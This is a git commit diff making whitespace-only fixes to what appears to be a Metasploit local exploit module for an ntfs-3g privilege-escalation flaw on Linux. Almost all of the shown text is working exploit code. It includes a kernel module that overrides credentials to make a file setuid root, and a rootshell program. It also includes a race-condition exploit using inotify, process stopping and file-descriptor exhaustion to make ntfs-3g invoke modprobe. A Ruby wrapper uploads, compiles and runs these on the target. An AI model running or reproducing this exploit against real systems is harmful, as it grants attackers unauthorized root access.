forgot add fixes for travis

bug/bundler_fix
h00die 2017-02-25 23:25:36 -05:00
parent a8609f5c66
commit 0c353841ab
1 changed files with 25 additions and 25 deletions


@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work. # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
def headers_installed?() def headers_installed?()
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}') output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
if output if output
if output.include?('linux-headers') if output.include?('linux-headers')
return true return true
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
CheckCode::Appears CheckCode::Appears
else else
print_error("Version installed not vulnerable: #{output}") print_error("Version installed not vulnerable: #{output}")
CheckCode::Safe CheckCode::Safe
end end
else else
print_error('ntfs-3g not installed') print_error('ntfs-3g not installed')
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
#include <linux/cred.h> #include <linux/cred.h>
#include <linux/syscalls.h> #include <linux/syscalls.h>
#include <linux/kallsyms.h> #include <linux/kallsyms.h>
static int suidfile_fd = -1; static int suidfile_fd = -1;
module_param(suidfile_fd, int, 0); module_param(suidfile_fd, int, 0);
static int __init init_rootmod(void) { static int __init init_rootmod(void) {
int (*sys_fchown_)(int fd, int uid, int gid); int (*sys_fchown_)(int fd, int uid, int gid);
int (*sys_fchmod_)(int fd, int mode); int (*sys_fchmod_)(int fd, int mode);
const struct cred *kcred, *oldcred; const struct cred *kcred, *oldcred;
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown"); sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod"); sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
printk(KERN_INFO "rootmod loading\n"); printk(KERN_INFO "rootmod loading\n");
kcred = prepare_kernel_cred(NULL); kcred = prepare_kernel_cred(NULL);
oldcred = override_creds(kcred); oldcred = override_creds(kcred);
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
revert_creds(oldcred); revert_creds(oldcred);
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */ return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
} }
static void __exit cleanup_rootmod(void) {} static void __exit cleanup_rootmod(void) {}
module_init(init_rootmod); module_init(init_rootmod);
module_exit(cleanup_rootmod); module_exit(cleanup_rootmod);
MODULE_LICENSE("GPL v2"); MODULE_LICENSE("GPL v2");
} }
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
#include <err.h> #include <err.h>
#include <stdio.h> #include <stdio.h>
#include <sys/types.h> #include <sys/types.h>
int main(void) { int main(void) {
if (setuid(0) || setgid(0)) if (setuid(0) || setgid(0))
err(1, "setuid/setgid"); err(1, "setuid/setgid");
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
#include <sys/wait.h> #include <sys/wait.h>
#include <time.h> #include <time.h>
#include <sys/utsname.h> #include <sys/utsname.h>
int main(void) { int main(void) {
/* prevent shell from backgrounding ntfs-3g when stopped */ /* prevent shell from backgrounding ntfs-3g when stopped */
pid_t initial_fork_child = fork(); pid_t initial_fork_child = fork();
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
execl("rootshell", "rootshell", NULL); execl("rootshell", "rootshell", NULL);
exit(0); exit(0);
} }
char buf[1000] = {0}; char buf[1000] = {0};
// Set up workspace with volume, mountpoint, modprobe config and module directory. // Set up workspace with volume, mountpoint, modprobe config and module directory.
char template[] = "/tmp/ntfs_sploit.XXXXXX"; char template[] = "/tmp/ntfs_sploit.XXXXXX";
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
template, template); template, template);
if (system(system_cmd)) if (system(system_cmd))
errx(1, "shell command failed"); errx(1, "shell command failed");
// Set up inotify watch for /proc/mounts. // Set up inotify watch for /proc/mounts.
// Note: /proc/mounts is a symlink to /proc/self/mounts, so // Note: /proc/mounts is a symlink to /proc/self/mounts, so
// the watch will only see accesses by this process. // the watch will only see accesses by this process.
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1) if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
err(1, "unable to watch /proc/mounts"); err(1, "unable to watch /proc/mounts");
// Set up inotify watch for /proc/filesystems. // Set up inotify watch for /proc/filesystems.
// This can be used to detect whether we lost the race. // This can be used to detect whether we lost the race.
int fs_inotify_fd = inotify_init1(IN_CLOEXEC); int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1) if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
err(1, "unable to watch /proc/filesystems"); err(1, "unable to watch /proc/filesystems");
// Set up inotify watch for /sbin/modprobe. // Set up inotify watch for /sbin/modprobe.
// This can be used to detect when we can release all our open files. // This can be used to detect when we can release all our open files.
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC); int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
err(1, "unable to create inotify fd?"); err(1, "unable to create inotify fd?");
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1) if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
err(1, "unable to watch /sbin/modprobe"); err(1, "unable to watch /sbin/modprobe");
int do_exec_pipe[2]; int do_exec_pipe[2];
if (pipe2(do_exec_pipe, O_CLOEXEC)) if (pipe2(do_exec_pipe, O_CLOEXEC))
err(1, "pipe"); err(1, "pipe");
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL); execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
} }
child = getpid(); child = getpid();
// Now launch ntfs-3g and wait until it opens /proc/mounts // Now launch ntfs-3g and wait until it opens /proc/mounts
if (write(do_exec_pipe[1], buf, 1) != 1) if (write(do_exec_pipe[1], buf, 1) != 1)
errx(1, "pipe write failed"); errx(1, "pipe write failed");
if (read(inotify_fd, buf, sizeof(buf)) <= 0) if (read(inotify_fd, buf, sizeof(buf)) <= 0)
errx(1, "inotify read failed"); errx(1, "inotify read failed");
if (kill(getppid(), SIGSTOP)) if (kill(getppid(), SIGSTOP))
err(1, "can't stop setuid parent"); err(1, "can't stop setuid parent");
// Check whether we won the main race. // Check whether we won the main race.
struct pollfd poll_fds[1] = {{ struct pollfd poll_fds[1] = {{
.fd = fs_inotify_fd, .fd = fs_inotify_fd,
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
exit(1); exit(1);
} }
puts("looks like we won the race"); puts("looks like we won the race");
// Open as many files as possible. Whenever we have // Open as many files as possible. Whenever we have
// a bunch of open files, move them into a new process. // a bunch of open files, move them into a new process.
int total_open_files = 0; int total_open_files = 0;
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
if (reached_limit) if (reached_limit)
break; break;
} }
// Wake up ntfs-3g and keep allocating files, then free up // Wake up ntfs-3g and keep allocating files, then free up
// the files as soon as we're reasonably certain that either // the files as soon as we're reasonably certain that either
// modprobe was spawned or the attack failed. // modprobe was spawned or the attack failed.
if (kill(getppid(), SIGCONT)) if (kill(getppid(), SIGCONT))
err(1, "SIGCONT"); err(1, "SIGCONT");
time_t start_time = time(NULL); time_t start_time = time(NULL);
while (1) { while (1) {
for (int i=0; i<1000; i++) { for (int i=0; i<1000; i++) {
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
print_status('Writing files to target') print_status('Writing files to target')
cmd_exec("cd #{datastore['WritableDir']}") cmd_exec("cd #{datastore['WritableDir']}")
#write all the files and compile. This is equivalent to the original compile.sh #write all the files and compile. This is equivalent to the original compile.sh
#gcc -o rootshell rootshell.c -Wall #gcc -o rootshell rootshell.c -Wall
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall") upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec('/sbin/depmod -b depmod_tmp/') cmd_exec('/sbin/depmod -b depmod_tmp/')
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .') cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
cmd_exec('rm -rf depmod_tmp') cmd_exec('rm -rf depmod_tmp')
register_file_for_cleanup("#{rootmod_path}.ko") register_file_for_cleanup("#{rootmod_path}.ko")
register_file_for_cleanup("#{rootmod_path}.mod.c") register_file_for_cleanup("#{rootmod_path}.mod.c")
register_file_for_cleanup("#{rootmod_path}.mod.o") register_file_for_cleanup("#{rootmod_path}.mod.o")
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
output = cmd_exec(sploit_path) output = cmd_exec(sploit_path)
unless session_created? unless session_created?
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened, # this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
# but binary payload was caught, or NIPS shut down the callback etc. # but binary payload was caught, or NIPS shut down the callback etc.
vprint_error(output) vprint_error(output)
end end
end end